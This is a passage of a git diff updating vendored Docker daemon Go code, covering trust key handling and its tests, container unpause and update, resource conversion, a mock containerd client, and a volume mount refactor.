+	} else if err != nil {
+		return nil, fmt.Errorf("Error loading key file %s: %s", trustKeyPath, err)
+	}
+	return trustKey, nil
+}
+
+func serializePrivateKey(key libtrust.PrivateKey, ext string) (encoded []byte, err error) {
+	if ext == ".json" || ext == ".jwk" {
+		encoded, err = json.Marshal(key)
+		if err != nil {
+			return nil, fmt.Errorf("unable to encode private key JWK: %s", err)
+		}
+	} else {
+		pemBlock, err := key.PEMBlock()
+		if err != nil {
+			return nil, fmt.Errorf("unable to encode private key PEM: %s", err)
+		}
+		encoded = pem.EncodeToMemory(pemBlock)
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/daemon/trustkey_test.go b/vendor/github.com/docker/docker/daemon/trustkey_test.go
new file mode 100644
index 0000000000..e49e76aa3e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/trustkey_test.go
@@ -0,0 +1,71 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
+)
+
+// LoadOrCreateTrustKey
+func TestLoadOrCreateTrustKeyInvalidKeyFile(t *testing.T) {
+	tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test")
+	assert.NilError(t, err)
+	defer os.RemoveAll(tmpKeyFolderPath)
+
+	tmpKeyFile, err := ioutil.TempFile(tmpKeyFolderPath, "keyfile")
+	assert.NilError(t, err)
+
+	_, err = loadOrCreateTrustKey(tmpKeyFile.Name())
+	assert.Check(t, is.ErrorContains(err, "Error loading key file"))
+}
+
+func TestLoadOrCreateTrustKeyCreateKeyWhenFileDoesNotExist(t *testing.T) {
+	tmpKeyFolderPath := fs.NewDir(t, "api-trustkey-test")
+	defer tmpKeyFolderPath.Remove()
+
+	// Without the need to create the folder hierarchy
+	tmpKeyFile := tmpKeyFolderPath.Join("keyfile")
+
+	key, err := loadOrCreateTrustKey(tmpKeyFile)
+	assert.NilError(t, err)
+	assert.Check(t, key != nil)
+
+	_, err = os.Stat(tmpKeyFile)
+	assert.NilError(t, err, "key file doesn't exist")
+}
+
+func TestLoadOrCreateTrustKeyCreateKeyWhenDirectoryDoesNotExist(t *testing.T) {
+	tmpKeyFolderPath := fs.NewDir(t, "api-trustkey-test")
+	defer tmpKeyFolderPath.Remove()
+	tmpKeyFile := tmpKeyFolderPath.Join("folder/hierarchy/keyfile")
+
+	key, err := loadOrCreateTrustKey(tmpKeyFile)
+	assert.NilError(t, err)
+	assert.Check(t, key != nil)
+
+	_, err = os.Stat(tmpKeyFile)
+	assert.NilError(t, err, "key file doesn't exist")
+}
+
+func TestLoadOrCreateTrustKeyCreateKeyNoPath(t *testing.T) {
+	defer os.Remove("keyfile")
+	key, err := loadOrCreateTrustKey("keyfile")
+	assert.NilError(t, err)
+	assert.Check(t, key != nil)
+
+	_, err = os.Stat("keyfile")
+	assert.NilError(t, err, "key file doesn't exist")
+}
+
+func TestLoadOrCreateTrustKeyLoadValidKey(t *testing.T) {
+	tmpKeyFile := filepath.Join("testdata", "keyfile")
+	key, err := loadOrCreateTrustKey(tmpKeyFile)
+	assert.NilError(t, err)
+	expected := "AWX2:I27X:WQFX:IOMK:CNAK:O7PW:VYNB:ZLKC:CVAE:YJP2:SI4A:XXAY"
+	assert.Check(t, is.Contains(key.String(), expected))
+}
diff --git a/vendor/github.com/docker/docker/daemon/unpause.go b/vendor/github.com/docker/docker/daemon/unpause.go
index e66b3868dc..9061d50a16 100644
--- a/vendor/github.com/docker/docker/daemon/unpause.go
+++ b/vendor/github.com/docker/docker/daemon/unpause.go
@@ -1,9 +1,11 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 
 	"github.com/docker/docker/container"
+	"github.com/sirupsen/logrus"
 )
 
 // ContainerUnpause unpauses a container
@@ -12,12 +14,7 @@ func (daemon *Daemon) ContainerUnpause(name string) error {
 	if err != nil {
 		return err
 	}
-
-	if err := daemon.containerUnpause(container); err != nil {
-		return err
-	}
-
-	return nil
+	return daemon.containerUnpause(container)
 }
 
 // containerUnpause resumes the container execution after the container is paused.
@@ -30,9 +27,18 @@ func (daemon *Daemon) containerUnpause(container *container.Container) error {
 		return fmt.Errorf("Container %s is not paused", container.ID)
 	}
 
-	if err := daemon.containerd.Resume(container.ID); err != nil {
+	if err := daemon.containerd.Resume(context.Background(), container.ID); err != nil {
 		return fmt.Errorf("Cannot unpause container %s: %s", container.ID, err)
 	}
 
+	container.Paused = false
+	daemon.setStateCounter(container)
+	daemon.updateHealthMonitor(container)
+	daemon.LogContainerEvent(container, "unpause")
+
+	if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+		logrus.WithError(err).Warnf("could not save container to disk")
+	}
+
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/update.go b/vendor/github.com/docker/docker/daemon/update.go
index 6e26eeb96a..0ebb139d3d 100644
--- a/vendor/github.com/docker/docker/daemon/update.go
+++ b/vendor/github.com/docker/docker/daemon/update.go
@@ -1,20 +1,28 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 
 	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
 )
 
 // ContainerUpdate updates configuration of the container
 func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error) {
 	var warnings []string
 
-	warnings, err := daemon.verifyContainerSettings(hostConfig, nil, true)
+	c, err := daemon.GetContainer(name)
 	if err != nil {
 		return container.ContainerUpdateOKBody{Warnings: warnings}, err
 	}
 
+	warnings, err = daemon.verifyContainerSettings(c.OS, hostConfig, nil, true)
+	if err != nil {
+		return container.ContainerUpdateOKBody{Warnings: warnings}, errdefs.InvalidParameter(err)
+	}
+
 	if err := daemon.update(name, hostConfig); err != nil {
 		return container.ContainerUpdateOKBody{Warnings: warnings}, err
 	}
@@ -22,20 +30,6 @@ func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostCon
 	return container.ContainerUpdateOKBody{Warnings: warnings}, nil
 }
 
-// ContainerUpdateCmdOnBuild updates Path and Args for the container with ID cID.
-func (daemon *Daemon) ContainerUpdateCmdOnBuild(cID string, cmd []string) error {
-	if len(cmd) == 0 {
-		return nil
-	}
-	c, err := daemon.GetContainer(cID)
-	if err != nil {
-		return err
-	}
-	c.Path = cmd[0]
-	c.Args = cmd[1:]
-	return nil
-}
-
 func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) error {
 	if hostConfig == nil {
 		return nil
@@ -52,19 +46,27 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro
 		if restoreConfig {
 			container.Lock()
 			container.HostConfig = &backupHostConfig
-			container.ToDisk()
+			container.CheckpointTo(daemon.containersReplica)
 			container.Unlock()
 		}
 	}()
 
 	if container.RemovalInProgress || container.Dead {
-		return errCannotUpdate(container.ID, fmt.Errorf("Container is marked for removal and cannot be \"update\"."))
+		return errCannotUpdate(container.ID, fmt.Errorf("container is marked for removal and cannot be \"update\""))
 	}
 
+	container.Lock()
 	if err := container.UpdateContainer(hostConfig); err != nil {
 		restoreConfig = true
+		container.Unlock()
+		return errCannotUpdate(container.ID, err)
+	}
+	if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+		restoreConfig = true
+		container.Unlock()
 		return errCannotUpdate(container.ID, err)
 	}
+	container.Unlock()
 
 	// if Restart Policy changed, we need to update container monitor
 	if hostConfig.RestartPolicy.Name != "" {
@@ -76,9 +78,10 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro
 	// If container is running (including paused), we need to update configs
 	// to the real world.
 	if container.IsRunning() && !container.IsRestarting() {
-		if err := daemon.containerd.UpdateResources(container.ID, toContainerdResources(hostConfig.Resources)); err != nil {
+		if err := daemon.containerd.UpdateResources(context.Background(), container.ID, toContainerdResources(hostConfig.Resources)); err != nil {
 			restoreConfig = true
-			return errCannotUpdate(container.ID, err)
+			// TODO: it would be nice if containerd responded with better errors here so we can classify this better.
+			return errCannotUpdate(container.ID, errdefs.System(err))
 		}
 	}
 
@@ -88,5 +91,5 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro
 }
 
 func errCannotUpdate(containerID string, err error) error {
-	return fmt.Errorf("Cannot update container %s: %v", containerID, err)
+	return errors.Wrap(err, "Cannot update container "+containerID)
 }
diff --git a/vendor/github.com/docker/docker/daemon/update_linux.go b/vendor/github.com/docker/docker/daemon/update_linux.go
index f422325272..6a307eabc5 100644
--- a/vendor/github.com/docker/docker/daemon/update_linux.go
+++ b/vendor/github.com/docker/docker/daemon/update_linux.go
@@ -1,25 +1,54 @@
-// +build linux
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"time"
+
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/libcontainerd"
+	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
-func toContainerdResources(resources container.Resources) libcontainerd.Resources {
+func toContainerdResources(resources container.Resources) *libcontainerd.Resources {
 	var r libcontainerd.Resources
-	r.BlkioWeight = uint64(resources.BlkioWeight)
-	r.CpuShares = uint64(resources.CPUShares)
-	r.CpuPeriod = uint64(resources.CPUPeriod)
-	r.CpuQuota = uint64(resources.CPUQuota)
-	r.CpusetCpus = resources.CpusetCpus
-	r.CpusetMems = resources.CpusetMems
-	r.MemoryLimit = uint64(resources.Memory)
+
+	r.BlockIO = &specs.LinuxBlockIO{
+		Weight: &resources.BlkioWeight,
+	}
+
+	shares := uint64(resources.CPUShares)
+	r.CPU = &specs.LinuxCPU{
+		Shares: &shares,
+		Cpus:   resources.CpusetCpus,
+		Mems:   resources.CpusetMems,
+	}
+
+	var (
+		period uint64
+		quota  int64
+	)
+	if resources.NanoCPUs != 0 {
+		period = uint64(100 * time.Millisecond / time.Microsecond)
+		quota = resources.NanoCPUs * int64(period) / 1e9
+	}
+	if quota == 0 && resources.CPUQuota != 0 {
+		quota = resources.CPUQuota
+	}
+	if period == 0 && resources.CPUPeriod != 0 {
+		period = uint64(resources.CPUPeriod)
+	}
+
+	r.CPU.Period = &period
+	r.CPU.Quota = &quota
+
+	r.Memory = &specs.LinuxMemory{
+		Limit:       &resources.Memory,
+		Reservation: &resources.MemoryReservation,
+		Kernel:      &resources.KernelMemory,
+	}
+
 	if resources.MemorySwap > 0 {
-		r.MemorySwap = uint64(resources.MemorySwap)
+		r.Memory.Swap = &resources.MemorySwap
 	}
-	r.MemoryReservation = uint64(resources.MemoryReservation)
-	r.KernelMemoryLimit = uint64(resources.KernelMemory)
-	return r
+
+	return &r
 }
diff --git a/vendor/github.com/docker/docker/daemon/update_solaris.go b/vendor/github.com/docker/docker/daemon/update_solaris.go
deleted file mode 100644
index f3b545c5f0..0000000000
--- a/vendor/github.com/docker/docker/daemon/update_solaris.go
+++ /dev/null
@@ -1,11 +0,0 @@
-package daemon
-
-import (
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/libcontainerd"
-)
-
-func toContainerdResources(resources container.Resources) libcontainerd.Resources {
-	var r libcontainerd.Resources
-	return r
-}
diff --git a/vendor/github.com/docker/docker/daemon/update_windows.go b/vendor/github.com/docker/docker/daemon/update_windows.go
index 01466260bb..fada3c1c0b 100644
--- a/vendor/github.com/docker/docker/daemon/update_windows.go
+++ b/vendor/github.com/docker/docker/daemon/update_windows.go
@@ -1,13 +1,11 @@
-// +build windows
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/libcontainerd"
 )
 
-func toContainerdResources(resources container.Resources) libcontainerd.Resources {
-	var r libcontainerd.Resources
-	return r
+func toContainerdResources(resources container.Resources) *libcontainerd.Resources {
+	// We don't support update, so do nothing
+	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/util_test.go b/vendor/github.com/docker/docker/daemon/util_test.go
new file mode 100644
index 0000000000..b2c464f737
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/util_test.go
@@ -0,0 +1,65 @@
+// +build linux
+
+package daemon
+
+import (
+	"context"
+	"time"
+
+	"github.com/containerd/containerd"
+	"github.com/docker/docker/libcontainerd"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// Mock containerd client implementation, for unit tests.
+type MockContainerdClient struct {
+}
+
+func (c *MockContainerdClient) Version(ctx context.Context) (containerd.Version, error) {
+	return containerd.Version{}, nil
+}
+func (c *MockContainerdClient) Restore(ctx context.Context, containerID string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error) {
+	return false, 0, nil
+}
+func (c *MockContainerdClient) Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error {
+	return nil
+}
+func (c *MockContainerdClient) Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error) {
+	return 0, nil
+}
+func (c *MockContainerdClient) SignalProcess(ctx context.Context, containerID, processID string, signal int) error {
+	return nil
+}
+func (c *MockContainerdClient) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio libcontainerd.StdioCallback) (int, error) {
+	return 0, nil
+}
+func (c *MockContainerdClient) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error {
+	return nil
+}
+func (c *MockContainerdClient) CloseStdin(ctx context.Context, containerID, processID string) error {
+	return nil
+}
+func (c *MockContainerdClient) Pause(ctx context.Context, containerID string) error  { return nil }
+func (c *MockContainerdClient) Resume(ctx context.Context, containerID string) error { return nil }
+func (c *MockContainerdClient) Stats(ctx context.Context, containerID string) (*libcontainerd.Stats, error) {
+	return nil, nil
+}
+func (c *MockContainerdClient) ListPids(ctx context.Context, containerID string) ([]uint32, error) {
+	return nil, nil
+}
+func (c *MockContainerdClient) Summary(ctx context.Context, containerID string) ([]libcontainerd.Summary, error) {
+	return nil, nil
+}
+func (c *MockContainerdClient) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) {
+	return 0, time.Time{}, nil
+}
+func (c *MockContainerdClient) Delete(ctx context.Context, containerID string) error { return nil }
+func (c *MockContainerdClient) Status(ctx context.Context, containerID string) (libcontainerd.Status, error) {
+	return "null", nil
+}
+func (c *MockContainerdClient) UpdateResources(ctx context.Context, containerID string, resources *libcontainerd.Resources) error {
+	return nil
+}
+func (c *MockContainerdClient) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes.go b/vendor/github.com/docker/docker/daemon/volumes.go
index 10cf787709..a20ff1fbf5 100644
--- a/vendor/github.com/docker/docker/daemon/volumes.go
+++ b/vendor/github.com/docker/docker/daemon/volumes.go
@@ -1,21 +1,25 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"errors"
-	"fmt"
+	"context"
 	"os"
 	"path/filepath"
+	"reflect"
 	"strings"
+	"time"
 
-	"github.com/Sirupsen/logrus"
-	dockererrors "github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/mount"
 	mounttypes "github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/volume"
-	"github.com/docker/docker/volume/drivers"
-	"github.com/opencontainers/runc/libcontainer/label"
+	volumemounts "github.com/docker/docker/volume/mounts"
+	"github.com/docker/docker/volume/service"
+	volumeopts "github.com/docker/docker/volume/service/opts"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -26,21 +30,6 @@ var (
 
 type mounts []container.Mount
 
-// volumeToAPIType converts a volume.Volume to the type used by the Engine API
-func volumeToAPIType(v volume.Volume) *types.Volume {
-	tv := &types.Volume{
-		Name:   v.Name(),
-		Driver: v.DriverName(),
-	}
-	if v, ok := v.(volume.DetailedVolume); ok {
-		tv.Labels = v.Labels()
-		tv.Options = v.Options()
-		tv.Scope = v.Scope()
-	}
-
-	return tv
-}
-
 // Len returns the number of mounts. Used in sorting.
 func (m mounts) Len() int {
 	return len(m)
@@ -72,7 +61,10 @@ func (m mounts) parts(i int) int {
 // 4. Cleanup old volumes that are about to be reassigned.
 func (daemon *Daemon) registerMountPoints(container *container.Container, hostConfig *containertypes.HostConfig) (retErr error) {
 	binds := map[string]bool{}
-	mountPoints := map[string]*volume.MountPoint{}
+	mountPoints := map[string]*volumemounts.MountPoint{}
+	parser := volumemounts.NewParser(container.OS)
+
+	ctx := context.TODO()
 	defer func() {
 		// clean up the container mountpoints once return with error
 		if retErr != nil {
@@ -80,11 +72,20 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo
 				if m.Volume == nil {
 					continue
 				}
-				daemon.volumes.Dereference(m.Volume, container.ID)
+				daemon.volumes.Release(ctx, m.Volume.Name(), container.ID)
 			}
 		}
 	}()
 
+	dereferenceIfExists := func(destination string) {
+		if v, ok := mountPoints[destination]; ok {
+			logrus.Debugf("Duplicate mount point '%s'", destination)
+			if v.Volume != nil {
+				daemon.volumes.Release(ctx, v.Volume.Name(), container.ID)
+			}
+		}
+	}
+
 	// 1. Read already configured mount points.
 	for destination, point := range container.MountPoints {
 		mountPoints[destination] = point
@@ -92,7 +93,7 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo
 
 	// 2. Read volumes from other containers.
 	for _, v := range hostConfig.VolumesFrom {
-		containerID, mode, err := volume.ParseVolumesFrom(v)
+		containerID, mode, err := parser.ParseVolumesFrom(v)
 		if err != nil {
 			return err
 		}
@@ -103,10 +104,11 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo
 		}
 
 		for _, m := range c.MountPoints {
-			cp := &volume.MountPoint{
+			cp := &volumemounts.MountPoint{
+				Type:        m.Type,
 				Name:        m.Name,
 				Source:      m.Source,
-				RW:          m.RW && volume.ReadWrite(mode),
+				RW:          m.RW && parser.ReadWrite(mode),
 				Driver:      m.Driver,
 				Destination: m.Destination,
 				Propagation: m.Propagation,
@@ -115,90 +117,106 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo
 			}
 
 			if len(cp.Source) == 0 {
-				v, err := daemon.volumes.GetWithRef(cp.Name, cp.Driver, container.ID)
+				v, err := daemon.volumes.Get(ctx, cp.Name, volumeopts.WithGetDriver(cp.Driver), volumeopts.WithGetReference(container.ID))
 				if err != nil {
 					return err
 				}
-				cp.Volume = v
+				cp.Volume = &volumeWrapper{v: v, s: daemon.volumes}
 			}
-
+			dereferenceIfExists(cp.Destination)
 			mountPoints[cp.Destination] = cp
 		}
 	}
 
 	// 3. Read bind mounts
 	for _, b := range hostConfig.Binds {
-		bind, err := volume.ParseMountRaw(b, hostConfig.VolumeDriver)
+		bind, err := parser.ParseMountRaw(b, hostConfig.VolumeDriver)
 		if err != nil {
 			return err
 		}
+		needsSlavePropagation, err := daemon.validateBindDaemonRoot(bind.Spec)
+		if err != nil {
+			return err
+		}
+		if needsSlavePropagation {
+			bind.Propagation = mount.PropagationRSlave
+		}
 
 		// #10618
 		_, tmpfsExists := hostConfig.Tmpfs[bind.Destination]
 		if binds[bind.Destination] || tmpfsExists {
-			return fmt.Errorf("Duplicate mount point '%s'", bind.Destination)
+			return duplicateMountPointError(bind.Destination)
 		}
 
 		if bind.Type == mounttypes.TypeVolume {
 			// create the volume
-			v, err := daemon.volumes.CreateWithRef(bind.Name, bind.Driver, container.ID, nil, nil)
+			v, err := daemon.volumes.Create(ctx, bind.Name, bind.Driver, volumeopts.WithCreateReference(container.ID))
 			if err != nil {
 				return err
 			}
-			bind.Volume = v
-			bind.Source = v.Path()
+			bind.Volume = &volumeWrapper{v: v, s: daemon.volumes}
+			bind.Source = v.Mountpoint
 			// bind.Name is an already existing volume, we need to use that here
-			bind.Driver = v.DriverName()
+			bind.Driver = v.Driver
 			if bind.Driver == volume.DefaultDriverName {
 				setBindModeIfNull(bind)
 			}
 		}
 
 		binds[bind.Destination] = true
+		dereferenceIfExists(bind.Destination)
 		mountPoints[bind.Destination] = bind
 	}
 
 	for _, cfg := range hostConfig.Mounts {
-		mp, err := volume.ParseMountSpec(cfg)
+		mp, err := parser.ParseMountSpec(cfg)
 		if err != nil {
-			return dockererrors.NewBadRequestError(err)
+			return errdefs.InvalidParameter(err)
+		}
+		needsSlavePropagation, err := daemon.validateBindDaemonRoot(mp.Spec)
+		if err != nil {
+			return err
+		}
+		if needsSlavePropagation {
+			mp.Propagation = mount.PropagationRSlave
 		}
 
 		if binds[mp.Destination] {
-			return fmt.Errorf("Duplicate mount point '%s'", cfg.Target)
+			return duplicateMountPointError(cfg.Target)
 		}
 
 		if mp.Type == mounttypes.TypeVolume {
-			var v volume.Volume
+			var v *types.Volume
 			if cfg.VolumeOptions != nil {
 				var driverOpts map[string]string
 				if cfg.VolumeOptions.DriverConfig != nil {
 					driverOpts = cfg.VolumeOptions.DriverConfig.Options
 				}
-				v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, driverOpts, cfg.VolumeOptions.Labels)
+				v, err = daemon.volumes.Create(ctx,
+					mp.Name,
+					mp.Driver,
+					volumeopts.WithCreateReference(container.ID),
+					volumeopts.WithCreateOptions(driverOpts),
+					volumeopts.WithCreateLabels(cfg.VolumeOptions.Labels),
+				)
 			} else {
-				v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, nil, nil)
+				v, err = daemon.volumes.Create(ctx, mp.Name, mp.Driver, volumeopts.WithCreateReference(container.ID))
 			}
 			if err != nil {
 				return err
 			}
 
-			if err := label.Relabel(mp.Source, container.MountLabel, false); err != nil {
-				return err
-			}
-			mp.Volume = v
-			mp.Name = v.Name()
-			mp.Driver = v.DriverName()
-
-			// only use the cached path here since getting the path is not necessary right now and calling `Path()` may be slow
-			if cv, ok := v.(interface {
-				CachedPath() string
-			}); ok {
-				mp.Source = cv.CachedPath()
+			mp.Volume = &volumeWrapper{v: v, s: daemon.volumes}
+			mp.Name = v.Name
+			mp.Driver = v.Driver
+
+			if mp.Driver == volume.DefaultDriverName {
+				setBindModeIfNull(mp)
 			}
 		}
 
 		binds[mp.Destination] = true
+		dereferenceIfExists(mp.Destination)
 		mountPoints[mp.Destination] = mp
 	}
 
@@ -206,9 +224,9 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo
 
 	// 4. Cleanup old volumes that are about to be reassigned.
 	for _, m := range mountPoints {
-		if m.BackwardsCompatible() {
+		if parser.IsBackwardCompatible(m) {
 			if mp, exists := container.MountPoints[m.Destination]; exists && mp.Volume != nil {
-				daemon.volumes.Dereference(mp.Volume, container.ID)
+				daemon.volumes.Release(ctx, mp.Volume.Name(), container.ID)
 			}
 		}
 	}
@@ -221,83 +239,179 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo
 
 // lazyInitializeVolume initializes a mountpoint's volume if needed.
 // This happens after a daemon restart.
-func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volume.MountPoint) error {
+func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volumemounts.MountPoint) error {
 	if len(m.Driver) > 0 && m.Volume == nil {
-		v, err := daemon.volumes.GetWithRef(m.Name, m.Driver, containerID)
+		v, err := daemon.volumes.Get(context.TODO(), m.Name, volumeopts.WithGetDriver(m.Driver), volumeopts.WithGetReference(containerID))
 		if err != nil {
 			return err
 		}
-		m.Volume = v
+		m.Volume = &volumeWrapper{v: v, s: daemon.volumes}
 	}
 	return nil
 }
 
-func backportMountSpec(container *container.Container) error {
-	for target, m := range container.MountPoints {
-		if m.Spec.Type != "" {
-			// if type is set on even one mount, no need to migrate
-			return nil
+// backportMountSpec resolves mount specs (introduced in 1.13) from pre-1.13
+// mount configurations
+// The container lock should not be held when calling this function.
+// Changes are only made in-memory and may make changes to containers referenced
+// by `container.HostConfig.VolumesFrom`
+func (daemon *Daemon) backportMountSpec(container *container.Container) {
+	container.Lock()
+	defer container.Unlock()
+
+	parser := volumemounts.NewParser(container.OS)
+
+	maybeUpdate := make(map[string]bool)
+	for _, mp := range container.MountPoints {
+		if mp.Spec.Source != "" && mp.Type != "" {
+			continue
+		}
+		maybeUpdate[mp.Destination] = true
+	}
+	if len(maybeUpdate) == 0 {
+		return
+	}
+
+	mountSpecs := make(map[string]bool, len(container.HostConfig.Mounts))
+	for _, m := range container.HostConfig.Mounts {
+		mountSpecs[m.Target] = true
+	}
+
+	binds := make(map[string]*volumemounts.MountPoint, len(container.HostConfig.Binds))
+	for _, rawSpec := range container.HostConfig.Binds {
+		mp, err := parser.ParseMountRaw(rawSpec, container.HostConfig.VolumeDriver)
+		if err != nil {
+			logrus.WithError(err).Error("Got unexpected error while re-parsing raw volume spec during spec backport")
+			continue
+		}
+		binds[mp.Destination] = mp
+	}
+
+	volumesFrom := make(map[string]volumemounts.MountPoint)
+	for _, fromSpec := range container.HostConfig.VolumesFrom {
+		from, _, err := parser.ParseVolumesFrom(fromSpec)
+		if err != nil {
+			logrus.WithError(err).WithField("id", container.ID).Error("Error reading volumes-from spec during mount spec backport")
+			continue
+		}
+		fromC, err := daemon.GetContainer(from)
+		if err != nil {
+			logrus.WithError(err).WithField("from-container", from).Error("Error looking up volumes-from container")
+			continue
+		}
+
+		// make sure from container's specs have been backported
+		daemon.backportMountSpec(fromC)
+
+		fromC.Lock()
+		for t, mp := range fromC.MountPoints {
+			volumesFrom[t] = *mp
+		}
+		fromC.Unlock()
+	}
+
+	needsUpdate := func(containerMount, other *volumemounts.MountPoint) bool {
+		if containerMount.Type != other.Type || !reflect.DeepEqual(containerMount.Spec, other.Spec) {
+			return true
+		}
+		return false
+	}
+
+	// main
+	for _, cm := range container.MountPoints {
+		if !maybeUpdate[cm.Destination] {
+			continue
+		}
+		// nothing to backport if from hostconfig.Mounts
+		if mountSpecs[cm.Destination] {
+			continue
 		}
-		if m.Name != "" {
-			m.Type = mounttypes.TypeVolume
-			m.Spec.Type = mounttypes.TypeVolume
 
-			// make sure this is not an anyonmous volume before setting the spec source
-			if _, exists := container.Config.Volumes[target]; !exists {
-				m.Spec.Source = m.Name
+		if mp, exists := binds[cm.Destination]; exists {
+			if needsUpdate(cm, mp) {
+				cm.Spec = mp.Spec
+				cm.Type = mp.Type
 			}
-			if container.HostConfig.VolumeDriver != "" {
-				m.Spec.VolumeOptions = &mounttypes.VolumeOptions{
-					DriverConfig: &mounttypes.Driver{Name: container.HostConfig.VolumeDriver},
+			continue
+		}
+
+		if cm.Name != "" {
+			if mp, exists := volumesFrom[cm.Destination]; exists {
+				if needsUpdate(cm, &mp) {
+					cm.Spec = mp.Spec
+					cm.Type = mp.Type
 				}
+				continue
 			}
-			if strings.Contains(m.Mode, "nocopy") {
-				if m.Spec.VolumeOptions == nil {
-					m.Spec.VolumeOptions = &mounttypes.VolumeOptions{}
-				}
-				m.Spec.VolumeOptions.NoCopy = true
+
+			if cm.Type != "" {
+				// probably specified via the hostconfig.Mounts
+				continue
 			}
+
+			// anon volume
+			cm.Type = mounttypes.TypeVolume
+			cm.Spec.Type = mounttypes.TypeVolume
 		} else {
-			m.Type = mounttypes.TypeBind
-			m.Spec.Type = mounttypes.TypeBind
-			m.Spec.Source = m.Source
-			if m.Propagation != "" {
-				m.Spec.BindOptions = &mounttypes.BindOptions{
-					Propagation: m.Propagation,
+			if cm.Type != "" {
+				// already updated
+				continue
+			}
+
+			cm.Type = mounttypes.TypeBind
+			cm.Spec.Type = mounttypes.TypeBind
+			cm.Spec.Source = cm.Source
+			if cm.Propagation != "" {
+				cm.Spec.BindOptions = &mounttypes.BindOptions{
+					Propagation: cm.Propagation,
 				}
 			}
 		}
 
-		m.Spec.Target = m.Destination
-		if !m.RW {
-			m.Spec.ReadOnly = true
-		}
+		cm.Spec.Target = cm.Destination
+		cm.Spec.ReadOnly = !cm.RW
 	}
-	return container.ToDiskLocking()
 }
 
-func (daemon *Daemon) traverseLocalVolumes(fn func(volume.Volume) error) error {
-	localVolumeDriver, err := volumedrivers.GetDriver(volume.DefaultDriverName)
-	if err != nil {
-		return fmt.Errorf("can't retrieve local volume driver: %v", err)
-	}
-	vols, err := localVolumeDriver.List()
-	if err != nil {
-		return fmt.Errorf("can't retrieve local volumes: %v", err)
-	}
+// VolumesService is used to perform volume operations
+func (daemon *Daemon) VolumesService() *service.VolumesService {
+	return daemon.volumes
+}
 
-	for _, v := range vols {
-		name := v.Name()
-		_, err := daemon.volumes.Get(name)
-		if err != nil {
-			logrus.Warnf("failed to retrieve volume %s from store: %v", name, err)
-		}
+type volumeMounter interface {
+	Mount(ctx context.Context, v *types.Volume, ref string) (string, error)
+	Unmount(ctx context.Context, v *types.Volume, ref string) error
+}
 
-		err = fn(v)
-		if err != nil {
-			return err
-		}
-	}
+type volumeWrapper struct {
+	v *types.Volume
+	s volumeMounter
+}
 
-	return nil
+func (v *volumeWrapper) Name() string {
+	return v.v.Name
+}
+
+func (v *volumeWrapper) DriverName() string {
+	return v.v.Driver
+}
+
+func (v *volumeWrapper) Path() string {
+	return v.v.Mountpoint
+}
+
+func (v *volumeWrapper) Mount(ref string) (string, error) {
+	return v.s.Mount(context.TODO(), v.v, ref)
+}
+
+func (v *volumeWrapper) Unmount(ref string) error {
+	return v.s.Unmount(context.TODO(), v.v, ref)
+}
+
+func (v *volumeWrapper) CreatedAt() (time.Time, error) {
+	return time.Time{}, errors.New("not implemented")
+}
+
+func (v *volumeWrapper) Status() map[string]interface{} {
+	return v.v.Status
 }
diff --git a/vendor/github.com/docker/docker/daemon/volumes_linux.go b/vendor/github.com/docker/docker/daemon/volumes_linux.go
new file mode 100644
index 0000000000..cf3d9ed159
